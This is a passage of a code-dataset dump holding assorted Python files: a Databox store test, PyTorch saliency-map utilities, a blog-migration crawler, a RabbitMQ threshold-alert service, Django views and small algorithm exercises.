main()\n","sub_path":"tests/ddl/files.py","file_name":"files.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"176660686","text":"__author__ = \"Poonam Yadav\"\n__copyright__ = \"Copyright 2017, The Databox Project\"\n__credits__ = [\"Databox team\"]\n__license__ = \"GPL\"\n__version__ = \"0.0.1\"\n__maintainer__ = \"Poonam Yadav\"\n__email__ = \"p.yadav@acm.org\"\n__status__ = \"Development\"\n\n#This code is setup for testing python library outside databox. 
Inside Databox, STORE_URI will be extracted from env DATABOX_ZMQ_ENDPOINT.\n# ARBITER URI will be derived from that as well (todo)\n\nimport sys\nfrom flask import Flask\nimport ssl\nimport os\nimport time\n\nsys.path.insert(1, '../')\nfrom lib import core_store as databox #main function as providing the storeclient of core store.\nfrom lib import config as config\nimport datetime as datetime\n\nTEST_STORE_URI = os.environ.get('DATABOX_ZMQ_ENDPOINT') or \"tcp://127.0.0.1:5555\"\nTEST_ARBITER_URI = os.environ.get('DATABOX_ARBITER_ENDPOINT') or \"tcp://127.0.0.1:4444\"\nDATA_SOURCE_ID = str(datetime.date.today())\n\n#newKVStore = databox.newKeyValueClient(TEST_STORE_URI, TEST_ARBITER_URI, False)\n#res = newKVStore.write(\"testdata1\", 'KeyWrite', '{\\\"TEST\\\": \\\"data\\\"}', 'JSON')\n#res = newKVStore.read(\"testdata1\", 'KeyWrite','JSON')\n#print(\"Read data from store \" + str(res))\n\nnewTSStore = databox.newTimeSeriesBlobClient(TEST_STORE_URI, TEST_ARBITER_URI, False)\ntimeline = databox.newDataSourceMetadata()\ntimeline['Description'] = 'Twitter user timeline data'\ntimeline['ContentType'] = 'application/json'\ntimeline['Vendor'] = 'Databox Inc.'\ntimeline['DataSourceType'] = 'testdata1'\ntimeline['DataSourceID'] = 'testdata1'\ntimeline['StoreType'] = 'ts'\n\ntry:\n    newTSStore.RegisterDatasource(timeline)\nexcept ValueError:\n    print(\"error in registering datasource\")\ncat = newTSStore.GetDatasourceCatalogue()\n\nres = newTSStore.write('testdata1','{\\\"idx\\\": \\\"16\\\"}', contentFormat ='JSON')\n\nres1 = newTSStore.latest('testdata1')\nif(res1):\n    print(\"Data res1 latest from the store \" + str(res1))\n\nres2 = newTSStore.earliest('testdata1')\nif(res2):\n    print(\"Data res2 earliest from the store \" + str(res2))\n\nres = newTSStore.write('testdata1','{\\\"idx\\\": \\\"17\\\"}', contentFormat ='JSON')\n\nres3 = newTSStore.lastN('testdata1', 1)\nif(res3):\n    print(\"Data res3 last 1 from the store \" + str(res3))\n\nres4 = newTSStore.lastN('testdata1', 2)\nif(res4):\n    print(\"Data res4 last 2 from the store \" + str(res4))\n\nres5 = newTSStore.since('testdata1', 1570575084924)\nif(res5):\n    print(\"Data res5 since the time<1570575084924> from the store \" + str(res5))\n\n\nres6 = newTSStore.range('testdata1', 1570575084924, 1570575441326)\nif(res6):\n    print(\"Data res6 in range<1570575084924, 1570575441326> from the store \" + str(res6))\n\n\nres7 = newTSStore.writeAt('testdata1',1570575084925,'{\\\"idx\\\": \\\"20\\\"}')\n\nres8 = newTSStore.latest('testdata1')\n\nif(res8):\n    print(\"Data res8 latest from the store \" + str(res8))\n\n\n#app = Flask(__name__)\n#credentials = config.getHttpsCredentials()\n#fp_cert = open(os.path.abspath(\"certnew.pem\"), \"w+\")\n#fp_cert.write(str(credentials['cert']))\n#fp_cert.close()\n\n#fp_key = open(os.path.abspath(\"keynew.pem\"), \"w+\")\n#fp_key.write(str(credentials['key']))\n#fp_key.close()\n\n#ctx = ('certnew.pem', 'keynew.pem')\n\n#@app.route(\"/ui\")\n#def hello():\n#    return \"Hello World!\"\n\n#if __name__ == \"__main__\":\n#    print(\"A Databox Driver\")\n    #time.sleep(500)\n    #app.run(host='0.0.0.0', port=8080, ssl_context=ctx)\n\n","sub_path":"python/driver/drivertest.py","file_name":"drivertest.py","file_ext":"py","file_size_in_byte":3325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"262890362","text":"#!/usr/bin/python3\n\"\"\"\nSet of functions used to call a series of algorithms used to visualize the object localization of a pre-trained \nnetwork in PyTorch. 
The different algorithms are discussed in several papers, while the implementation is based, \nroughly, on work in the following repository (https://github.com/sar-gupta/weakly-supervised-localization-survey)\n\"\"\"\n\nimport numpy as np\nimport PIL\n\n\nimport torch\nimport torchvision\nimport torch.nn as nn\nfrom torch.autograd import Variable\n\ndef saliency_map_general(model, input, label, plot = False):\n    \"\"\"\n    saliency_map_general: implementation to return the most general form of the saliency map, informing\n    on the regions of interest that activate a specific label.\n    Args:\n        - model: (PyTorch) Trained model trying to understand \n        - input: Image to be classified and understood, passed as a PyTorch tensor (C x W x H)\n        - label: Class to identify the regions of interest\n    return: numpy array with heatmap data\n    \"\"\"\n    input = Variable(input.unsqueeze_(0),requires_grad = True)\n    output = model.forward(input)\n    model.zero_grad()\n\n    output[0][label].backward()\n\n    grads = input.grad.data.clamp(min=0)\n    grads.squeeze_()\n    grads.transpose_(0,1)\n    grads.transpose_(1,2)\n    grads = np.amax(grads.cpu().numpy(), axis=2)\n    \n    grads -= grads.min()\n    grads /= grads.max()\n    \n    grads *= 255\n    grads = grads.astype(int)\n    \n    return grads\n\n\ndef guided_saliency_map(model, input, label, plot = False):\n    \"\"\"\n    guided_saliency_map: implementation to return a guided saliency map, informing\n    on the regions of interest that activate a specific label.\n    Args:\n        - model: (PyTorch) Trained model trying to understand \n        - input: Image to be classified and understood, passed as a PyTorch tensor (C x W x H)\n        - label: Class to identify the regions of interest\n    return: numpy array with heatmap data \n    \"\"\"\n    input = Variable(input.unsqueeze_(0), requires_grad=True)\n    \n    try:\n        h = [0]*len(list(model.modules()))\n\n        def hookfunc(module, gradInput, gradOutput):\n            return tuple([(None if g is None else g.clamp(min=0)) for g in gradInput])\n\n        for j, i in enumerate(list(model.modules())):\n            h[j] = i.register_backward_hook(hookfunc)\n\n        output = model.forward(input)\n        model.zero_grad()\n\n\n        output[0][label].backward()\n\n        for i in range(len(list(model.modules()))):\n            h[i].remove()\n    except Exception as e:\n        print(e)\n        for i in range(len(list(model.modules()))):\n            h[i].remove()\n    \n    grads = input.grad.data.clamp(min=0)\n    grads.squeeze_()\n    grads.transpose_(0,1)\n    grads.transpose_(1,2)\n    grads = np.amax(grads.cpu().numpy(), axis=2)\n    \n    grads -= grads.min()\n    grads /= grads.max()\n    \n    grads *= 255\n    grads = grads.astype(int)\n\n    return grads\n\ndef gradcam(model, input, label, layer_name, plot=False):\n    \"\"\"\n    gradcam: implementation to return a class activation map using the gradient of class score with each \n    of last conv layer filters. 
Calculate weighted sum of gradients and filters to finally obtain a map \n    of size equal to size of filters.\n    Args:\n        - model: (PyTorch) Trained model trying to understand \n        - input: Image to be classified and understood, passed as a PyTorch tensor (C x W x H)\n        - label: Class to identify the regions of interest\n        - layer_name: Name of the layer to target, should be the last CNN.\n    return:\n        PIL image with activation map\n    \"\"\"\n    imgs_shape = (input.shape[1], input.shape[2])\n    rs = torchvision.transforms.Resize( imgs_shape )\n\n    #find the right layer\n    last_conv = None\n    for name, item in model._modules.items():\n        if name == layer_name:\n            last_conv = item\n\n    if last_conv == None:\n        print('Cannot find target layer')\n        return None\n\n    pre_image = input\n    global gcdata\n    global gcgrads\n\n    def bhook(module, gradInputs, gradOutputs):\n        global gcgrads\n        gcgrads = gradOutputs\n\n    def fhook(module, input, output):\n        global gcdata\n        gcdata = output\n    \n    hb = last_conv.register_backward_hook(bhook)\n    hf = last_conv.register_forward_hook(fhook)\n    \n    out = model(input.unsqueeze_(0))\n    model.zero_grad()\n    out[0, label].backward()\n    \n    hb.remove()\n    hf.remove()\n    \n    gcdata = gcdata[0]\n    gcgrads = gcgrads[0].squeeze()\n    \n    gcgrads = gcgrads.mean(dim=2, keepdim=True)\n    gcgrads = gcgrads.mean(dim=1, keepdim=True)\n    #\n    gcdata = gcdata.mul(gcgrads)\n    gcdata = gcdata.sum(dim=0, keepdim=True)\n    gcdata = gcdata.clamp(min=0)\n    \n    gcdata -= gcdata.min()\n    gcdata /= gcdata.max()\n\n    toi = torchvision.transforms.ToPILImage()\n    gcdata = np.array(rs(toi(gcdata.data.cpu())))\n\n    input.squeeze()\n    \n    return gcdata\n\ndef guided_gradcam(model, input, label,layer_name, plot = False):\n    \"\"\"\n    guided_gradcam: returns a combination of a guided saliency map and class activation map. This combines \n    the sensitivity to different classes from gradcam together with the greater resolution of the\n    saliency map.\n    Args:\n        - model: (PyTorch) Trained model trying to understand \n        - input: Image to be classified and understood, passed as a PyTorch tensor (C x W x H)\n        - label: Class to identify the regions of interest\n        - layer_name: Name of the layer to target, should be the last CNN.\n    return:\n        PIL image with activation map\n    \"\"\"\n    gc = gradcam(model, input, label, layer_name, plot=False)\n\n    guided = guided_saliency_map(model=model, input=input[0], label=label, plot=False)\n    gc = gc * guided\n    \n    rs = torchvision.transforms.Resize((32,32))\n\n    \n    gc -= gc.min()\n    gc = np.divide(gc, gc.max())\n    gc *= 255\n    gc = gc.astype(int)\n\n    return gc\n\ndef smooth_guided_saliency_map(model, input, label, transform,x=10, percent_noise=10, plot = True):\n    \"\"\"\n    smooth_guided_saliency_map: Implementation of guided saliency map accounting for the fact \n    small, local variations in the local derivatives lead to the apparent noise one sees. 
This implementation smooths\n    these.\n    Args:\n        - model: (PyTorch) Trained model trying to understand \n        - input: Image to be classified and understood, passed as a PyTorch tensor (C x W x H)\n        - x: Number of times to sample for the smoothing\n        - percent_noise: Percentage of noise to be introduced during sampling for smoothing\n    return:\n        PIL image with activation map\n    \"\"\"\n    tensor_input = input\n    \n    final_grad = torch.zeros(input.shape).cuda()\n    final_grad = final_grad.unsqueeze(0)\n    \n    h = [0]*len(list(model.modules()))\n\n    def hookfunc(module, gradInput, gradOutput):\n        return tuple([(None if g is None else g.clamp(min=0)) for g in gradInput])\n\n    for j, i in enumerate(list(model.modules())):\n        h[j] = i.register_backward_hook(hookfunc)\n    \n    for i in range(x):\n        temp_input = tensor_input\n        noise = torch.from_numpy(np.random.normal(loc=0, scale=(percent_noise/100) * \n                                                  (tensor_input.max() - tensor_input.min()), \n                                                  size=temp_input.shape)).type(torch.cuda.FloatTensor)\n        temp_input = (temp_input.cuda() + noise).cpu().numpy()\n        temp_input = np.transpose(temp_input, (1,2,0) )\n        temp_input = PIL.Image.fromarray(temp_input.astype(np.uint8))\n        temp_input = Variable(transform(temp_input).unsqueeze(0).cuda(), requires_grad=True)\n\n        output = model.forward(temp_input)\n        model.zero_grad()\n        output[0][label].backward()\n        final_grad += temp_input.grad.data\n    \n    for i in range(len(list(model.modules()))):\n        h[i].remove()\n    \n    grads = final_grad/x\n    grads = grads.clamp(min=0)\n    grads.squeeze_()\n    grads.transpose_(0,1)\n    grads.transpose_(1,2)\n    grads = np.amax(grads.cpu().numpy(), axis=2)\n    \n    grads -= grads.min()\n    grads /= grads.max()\n    \n    grads *= 255\n    grads = grads.astype(int)\n\n    return grads\n\ndef smooth_guided_gradcam(model, input, label, transform, layer_name, plot = False ):\n    guided = smooth_guided_saliency_map(model, input, label,transform = transform, plot = False)\n    gc = gradcam(model, input, label, layer_name = layer_name, plot=False)\n    gc = gc * guided\n    \n    rs = torchvision.transforms.Resize((32,32))\n\n    \n    gc -= gc.min()\n    gc = np.divide(gc, gc.max())\n    gc *= 255\n    gc = gc.astype(int)\n\n    return gc\n","sub_path":"Utils/visualize_object_survey.py","file_name":"visualize_object_survey.py","file_ext":"py","file_size_in_byte":8615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"179635448","text":"# html to markdown\n# tistory(html) 블로그를 github(markdown) 블로그로 옮기는 자동화 작업\n\n# 참고 자료\n# https://kimdoky.github.io/python/2017/06/12/python-urllib.html\n# https://jungwoon.github.io/python/crawling/2018/04/12/Crawling-2/\n# convert HTML to Markdown (https://www.browserling.com/tools/html-to-markdown)\n# python-markdownify (https://github.com/matthewwithanm/python-markdownify)\n\nfrom selenium import webdriver as wd\nfrom bs4 import BeautifulSoup as bs\n\n# Convert HTML to Markdown\nfrom markdownify import markdownify as md\n\nimport os\nimport urllib.request as req\n\n# 절대적 대기\nimport time\n\n# 선수 데이터\nmain_url = \"https://pakpark.tistory.com/\"\nstart = \"6\"\n\n# 드라이버 로드\ndriver = wd.Chrome(executable_path='/Users/parkyounghwan/git/Crawling/BlogTransfer/chromedriver')\n\n# 사이트 접속\ndriver.get(main_url + start)\n\narticle = driver.find_element_by_css_selector('#cMain>#mArticle')\n\n# 제목 찾기\ntitle = article.find_element_by_css_selector('.area_title>h3').text\ntitle = title.replace(' ', '-')\n\n# 카테고리 나누기\nif title.find('[') == 0:\n    category = title[title.find('[') + 1:title.find(']')]\nelse:\n    category = 'pakpark'\n\n# 날짜 찾기\nuserDateInfo=
article.find_element_by_css_selector('.area_title>.info_post').text\ndate = userDateInfo[14:25]\ndate = date.replace(\".\", \"-\")\n\n# 내용 찾기\nsite = bs(req.urlopen(main_url + start), \"html.parser\")\narticle = site.find(\"div\", {\"class\":\"area_view\"})\n\ncontent = \"\"\nfor tag in article.findAll(\"p\"):\n content += md(str(tag)) # html to markdown\n\n# 지킬 content 형식\njekyllform = '''---\nlayout: post\ntitle: input-title\ndate: input-date\ncategories: pakpark\ncomments: false\n---\n\n'''\n\njekyllform = jekyllform.replace('input-title', '\"' + title + '\"')\njekyllform = jekyllform.replace('input-date', date)\n\nif category != 'pakpark':\n jekyllform = jekyllform.replace('pakpark', category)\n\n# 파일 이름\nfilename = date + \"-\" + title\nfilename = filename.replace(\" \", \"\")\n\n# 파일 저장 (디렉터리 확인 -> (디렉터리 생성))\ndir_path = '/Users/parkyounghwan/git/parkyounghwan.github.io/_posts/'\n\ntry:\n if not os.path.exists(dir_path + category):\n os.makedirs(os.path.join(dir_path + category))\n print(\"디렉토리 생성: \", category)\n\n dir_path += category\nexcept OSError as e:\n if e.errno != errno.EEXIST:\n print(\"Failed to create directory!!!!\")\n raise\n\n# 파일 쓰기(write)\nfile_path = os.path.join(dir_path, filename + '.md')\nfid = open(file_path, 'w')\n\nif os.path.isfile(file_path):\n fid.write(jekyllform)\n fid.write(content)\n\nfid.close()\n\n# 다음 사이트 접속\n\n# 절대적 대기\ntime.sleep(3)\n\n# 종료\ndriver.close()\ndriver.quit()","sub_path":"BlogTransfer/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"386892405","text":"#!/usr/local/bin/python3\n# -*- coding: UTF-8 -*-\n\nimport requests\n\ntaskListURL = 'http://pm.jieniu.cc/issues?assigned_to_id=me&set_filter=1&sort=priority%3Adesc%2Cupdated_on%3Adesc'\n\ndef close():\n\tresponse = requests.get(taskListURL)\n\tprint(response.json())\n\nif __name__ == '__main__':\n\tclose()\n","sub_path":"Util/ClosePMTask.py","file_name":"ClosePMTask.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"575922303","text":"from django.http import JsonResponse, QueryDict\nfrom django.utils import timezone\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom chat_bot.models import Dictionary\n\nimport json\n\n@csrf_exempt\ndef dictionaries(request):\n if request.method == \"GET\":\n _dictionaries = Dictionary.objects.all()\n\n # hanle bot_id\n if 'bot_id' in request.session:\n bot_id = request.session['bot_id']\n _dictionaries = _dictionaries.filter(bot_id__exact=bot_id)\n\n return JsonResponse(list(_dictionaries.values()), safe=False)\n elif request.method == \"POST\":\n params = json.loads(request.body)\n Dictionary.objects.create(\n bot_id=bot_id,\n word=params.get(\"word\"),\n synonym=params.get(\"synonym\"),\n created_time=timezone.now()\n )\n return JsonResponse({\"status\": 200}, safe=False)\n\n\n@csrf_exempt\ndef dictionary_detail(request, id):\n if request.method == 'GET':\n _dictionaries = list(Dictionary.objects.filter(id=id).values())\n\n if not _dictionaries:\n return JsonResponse(None, safe=False)\n\n return JsonResponse(_dictionaries[0], safe=False)\n elif request.method == \"PUT\":\n params = json.loads(request.body)\n dictionary = Dictionary.objects.get(id=id)\n dictionary.word = params.get('word')\n dictionary.synonym = params.get('synonym')\n dictionary.updated_time = timezone.now()\n dictionary.save()\n return 
JsonResponse({\"status\": 200}, safe=False)\n elif request.method == \"DELETE\":\n dictionary = Dictionary.objects.get(id=id)\n dictionary.delete()\n return JsonResponse({\"status\": 200}, safe=False)\n\n","sub_path":"tdai/api/views/view_dictionary.py","file_name":"view_dictionary.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"17654673","text":"#!/usr/bin/env python3\n\n# Libraries\nimport time\nimport pika\nimport ot_data_pb2\nimport hiota_message_pb2\nimport common_pb2\nimport os\nimport json\nfrom datetime import datetime\nfrom influxdb import InfluxDBClient\nimport urllib3\nimport hiota_alert\n\n# Disable the warnings\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\n# Configurables\nrabbit_username = str(os.environ['AMQP_USERNAME'])\nrabbit_password = str(os.environ['AMQP_PASSWORD'])\namqp_broker = str(os.environ['AMQP_HOSTNAME'])\namqp_port = int(os.environ['AMQP_PORT'])\ndebug = int(os.environ['AMQP_DEBUG_BOOLEAN'])\nthreshold_value = float(os.environ[\"THRESHOLD_VALUE\"])\ntrace_id = str(os.environ['TRACE_ID'])\ninput_binding_key = str(os.environ['INPUT_BINDING_KEY'])\ninput_queue = str(os.environ['INPUT_QUEUE'])\noutput_binding_key = str(os.environ['OUTPUT_BINDING_KEY'])\nexchange_name = str(os.environ[\"EXCHANGE_NAME\"])\ndiscard_alert_value = int(os.environ[\"DISCARD_ALERT_VALUE\"])\nsave_to_influx = int(os.environ[\"STORE_ALERTS\"])\ninflux_hostname = str(os.environ[\"DEMO_INFLUX_HOSTNAME\"])\ninflux_port = int(os.environ[\"DEMO_INFLUX_PORT\"])\ninflux_username = str(os.environ[\"INFLUX_USERNAME\"])\ninflux_password = str(os.environ[\"INFLUX_PASSWORD\"])\ndata_source = str(os.environ[\"SOURCE\"])\ndata_to_process = str(os.environ[\"DATA_MODEL\"])\ndatabase = str(os.environ[\"DATA_BASE_NAME\"])\nalerts_table = str(os.environ[\"ALERTS_TABLE_NAME\"])\nseverity_level = int(os.environ[\"ALERT_SEVERITY\"])\n\n# Create a handler to process each message as it comes in\ndef processmessage(ch, method, properties, body):\n\n if debug:\n print(\"Processing a message.\")\n\n # Recieve the message and parse out the data\n message = hiota_message_pb2.HiotaMessage()\n message.ParseFromString(body)\n pay_load = (hiota_message_pb2.HiotaMessage(id=message.id, created=message.created, trace_id=[trace_id], ot_data=message.ot_data))\n\n if debug:\n print(pay_load)\n\n # Handle roll, pitch, yaw data from iPhone\n if data_source == \"iphone\" and data_to_process == \"json\":\n # Get the value\n json_data = json.loads(message.ot_data.data_point.value.binary)\n\n try:\n yaw = json_data[\"yaw\"]\n roll = json_data[\"roll\"]\n pitch = json_data[\"pitch\"]\n\n # Debug\n if debug:\n print(json_data)\n\n # If the user wants to discard the alerted value\n if abs(yaw) > threshold_value or abs(roll) > threshold_value or abs(pitch) > threshold_value:\n # Log the value out to the terminal\n alert_msg = \"ALERT!! The absolute value is over \" + str(threshold_value) + \\\n \". 
Current values are (yaw: \" + str(yaw) + \", roll: \" + str(roll) + \", pitch: \" + \\\n str(pitch) + \")\"\n print(alert_msg)\n hiota_alert.hiota_alert_message_pop(alert_msg, severity=severity_level)\n # If the user wants to save the data to an influx table\n if save_to_influx:\n # Create local time variable\n local_time = datetime.utcnow().strftime(\"%Y-%m-%dT%H:%M:%S.%fZ\")\n # Switch to Database\n client.switch_database(database)\n # Influx data\n influx_data = [\n {\n \"measurement\": alerts_table,\n \"tags\": {},\n \"time\": local_time,\n \"fields\": {\n \"yaw\": yaw,\n \"roll\": roll,\n \"pitch\": pitch\n }\n }\n ]\n # Write the data to influx\n client.write_points(influx_data)\n except KeyError:\n print(\"Data does not include 'yaw,' 'pitch,' and 'roll.' Your configuration is set up to read iPhone-JSON data for yaw, pitch, and roll.\")\n\n # Handle data coming from the data pump in xhiota format\n elif data_source == \"datapump\":\n # Get the value\n value = message.ot_data.data_point.value.sint64\n\n # Debug\n if debug:\n print(pay_load)\n\n # If the user wants to discard the alerted value\n if value > threshold_value:\n # Log the value out to the terminal\n alert_msg = \"ALERT!! The value is over \" + str(threshold_value) + \". Current value is \" + str(value)\n print(alert_msg)\n hiota_alert.hiota_alert_message_pop(alert_msg, severity=severity_level)\n if not discard_alert_value:\n # Serialize the payload (must use Protobuf serialization)\n pay_load = pay_load.SerializeToString()\n # Publish the message back to the Lumada system so it can be sent to the database\n channel.basic_publish(exchange=exchange_name, routing_key=output_binding_key, body=pay_load)\n else:\n # Serialize the payload (must use Protobuf serialization)\n pay_load = pay_load.SerializeToString()\n # Publish the message back to the Lumada system so it can be sent to the database\n channel.basic_publish(exchange=exchange_name, routing_key=output_binding_key, body=pay_load)\n\n# Connect to RabbitMQ AMQP instance\ncredentials = pika.PlainCredentials(username=rabbit_username, password=rabbit_password)\nconnection_params = pika.ConnectionParameters(host=amqp_broker, port=amqp_port, credentials=credentials, connection_attempts=5, socket_timeout=5, ssl=True)\n\n# Create a client to connect with Influxdb\nclient = InfluxDBClient(host=influx_hostname, port=influx_port, username=influx_username, password=influx_password, ssl=True, verify_ssl=False)\n\n# Infinite loop\ntry:\n\n if debug:\n print(\"Threshold app starting.\")\n\n connection = pika.BlockingConnection(connection_params)\n channel = connection.channel()\n\n if debug:\n print(\"Pika connections set.\")\n\n # Create a queue and bind to it\n channel.queue_declare(queue=input_queue)\n channel.queue_bind(exchange=exchange_name, queue=input_queue, routing_key=input_binding_key)\n\n if debug:\n print(\"Bound to pika queue.\")\n\n # Create a callback method to handle incoming messages\n channel.basic_consume(processmessage, queue=input_queue, no_ack=True)\n channel.start_consuming()\n\nexcept KeyboardInterrupt:\n connection.close()\n print(\"Script Exited\")\n\nexcept pika.exceptions.ConnectionClosed:\n print(\"Unable to connect to AMQP broker. 
The connection timed out.\")\n print(\"Input Binding Key: \" + input_binding_key)\n print(\"Input Queue: \" + input_queue)\n print(\"Output Binding Key: \" + output_binding_key)\n print(\"Trace ID: \" + trace_id)\n print(\"Exchange Name: \" + exchange_name)\n print(\"Rabbit User Name: \" + rabbit_username)\n print(\"Rabbit Password: \" + rabbit_password)\n print(\"Broker IP: \" + amqp_broker)\n print(\"Broker Port: \" + str(amqp_port))\n print(\"Debug Flag: \" + str(debug))\n print(\"Threshold Value: \" + str(threshold_value))","sub_path":"threshold_demo/thresholdapp.py","file_name":"thresholdapp.py","file_ext":"py","file_size_in_byte":7134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"616361169","text":"# -*- coding: utf-8 -*-\n\nimport socket\nimport struct\n\nfrom threading import Lock, Thread\n\nclass DataBank:\n\n \"\"\" Data class for thread safe access to bits and words space \"\"\"\n\n bits_lock = Lock()\n bits = [False] * 0x10000\n words_lock = Lock()\n words = [0] * 0x10000\n\n @classmethod\n def get_bits(cls, address, number=1):\n with cls.bits_lock:\n if (address >= 0) and (address + number <= len(cls.bits)):\n return cls.bits[address: number + address]\n else:\n return None\n\n @classmethod\n def set_bits(cls, address, bit_list):\n with cls.bits_lock:\n if (address >= 0) and (address + len(bit_list) <= len(cls.bits)):\n cls.bits[address: address + len(bit_list)] = bit_list\n return True\n else:\n return None\n\n @classmethod\n def get_words(cls, address, number=1):\n with cls.words_lock:\n if (address >= 0) and (address + number <= len(cls.words)):\n return cls.words[address: number + address]\n else:\n return None\n\n @classmethod\n def __get_word(cls, address): # with no lock, internal function\n if (address >= 0) and (address <= len(cls.words)):\n return cls.words[address]\n else:\n return None\n\n @classmethod\n def set_words(cls, address, word_list):\n with cls.words_lock:\n if (address >= 0) and (address + len(word_list) <= len(cls.words)):\n cls.words[address: address + len(word_list)] = word_list\n return True\n else:\n return None\n\n @classmethod\n def __set_word(cls, address, word):\n if (address >= 0) and (address <= len(cls.words)):\n cls.words[address] = word\n return True\n else:\n return None\n\n @classmethod\n def set_words_v2(cls, address, word_list):\n with cls.words_lock:\n if (address >= 0) and (address + len(word_list) <= len(cls.words)):\n index = 0\n for new_word in word_list:\n current_address = address + index\n old_word = cls.__get_word(current_address)\n if new_word == old_word:\n continue\n else:\n cls.__set_word(current_address, new_word)\n index += 1\n return True\n else:\n return None\n","sub_path":"data_source.py","file_name":"data_source.py","file_ext":"py","file_size_in_byte":2525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"578494564","text":"from typing import List\n\n\nclass Solution:\n def countCharacters(self, words: List[str], chars: str) -> int:\n s = 0\n\n stock = self.stom(chars)\n\n for w in words:\n usage = self.stom(w)\n good = True\n for i, c in usage.items():\n if i not in stock or stock[i] < c:\n good = False\n break\n if good:\n s += len(w)\n\n return s\n\n def stom(self, s):\n stock = {}\n for c in s:\n if c not in stock:\n stock[c] = 0\n stock[c] += 1\n\n return stock\n\n\nprint(Solution().countCharacters([\"cat\",\"bt\",\"hat\",\"tree\"], \"atach\"))\nprint(Solution().countCharacters(words = 
[\"hello\",\"world\",\"leetcode\"], chars = \"welldonehoneyr\"))","sub_path":"leetcode/char_stock.py","file_name":"char_stock.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"155911569","text":"# -*- coding:utf-8 -*-\nimport os,sys,csv\n\nsys.path.append(\"/share/WebSite/\")\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"WebSite.settings\")\n\nfrom django.contrib.auth.models import User as AuthUser\nfrom User import models as UserModels\n\nclass User(object):\n \"\"\"docstring for App\"\"\"\n def __init__(self):\n self.users = self._read()\n \n def _read(self):\n users = []\n for user in AuthUser.objects.all():\n try:\n UserModels.UserInfo.objects.get(user = user)\n except:\n users.append(user)\n print(\"user info read finish\")\n return users\n\n def _store(self):\n for user in self.users:\n try:\n institution = UserModels.Institution.objects.get(name=\"北京希望组\")\n except:\n institution = UserModels.Institution(\n name = \"北京希望组\",\n description = \"未定义\"\n )\n institution.save()\n userinfo = UserModels.UserInfo(\n user = user,\n institution = institution,\n title = '未定义'\n )\n userinfo.save()\n print(\"user info store finish\")\n def _institution(institution):\n return UserModels.Institution.objects.all()\n","sub_path":"lib/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"384493885","text":"from collections import deque\n\n# https://e-maxx.ru/algo/bfs\ndef bws(A, si):\n used = [0] * len(A)\n d = [0] * len(A)\n p = [0] * len(A)\n used[si] = True\n p[si] = -1\n\n q = deque([si])\n while len(q) > 0:\n vert = q.popleft()\n for vi in range(len(A)):\n if vi == vert:\n continue\n if vi == p[vert]:\n continue\n if A[vi] & A[vert] == 0:\n continue\n \n if used[vi] == False:\n used[vi] = True\n q.append(vi)\n d[vi] = d[vert] + 1\n p[vi] = vert\n else:\n # restore paths s -> vi and vert -> s\n cycle = set()\n k = vert\n while k != si:\n cycle.add(k)\n k = p[k]\n k = vi\n while k != si:\n cycle.add(k)\n k = p[k]\n cycle.add(si)\n return cycle\n \n return set()\n\ndef main():\n n = int(input())\n A = list(map(int, input().split()))\n assert n == len(A)\n\n\n A = list(filter(lambda x: x > 0, A))\n n = len(A)\n\n to_check = set(range(n))\n\n res = -1\n while (len(to_check) > 0):\n si = to_check.pop()\n cycle = bws(A, si)\n r = len(cycle)\n if r != 0:\n res = min(res, r) if res != -1 else r\n if res == 3: # bootleg\n print(res)\n return\n #to_check = to_check - cycle\n\n \n print(res)\n\n\nimport sys\ninput = sys.stdin.readline\nif __name__ == \"__main__\":\n main()","sub_path":"580/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":1649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"436794130","text":"# -*- coding: utf-8 -*-\nfrom django import forms\nfrom models import Document\n\nclass DocumentForm(forms.ModelForm):\n \"\"\"Form for editing a document\"\"\"\n revision = forms.IntegerField(widget=forms.HiddenInput())\n \n class Meta:\n model = Document\n fields = ('subject', 'content')\n widgets = {\n 'subject': forms.TextInput(attrs={'class':'span4'}),\n 'content': forms.Textarea(),\n }\n\nclass VisibilityForm(forms.ModelForm):\n \"\"\"Form for managing visibility option of a document\"\"\"\n class Meta:\n model = Document\n fields = 
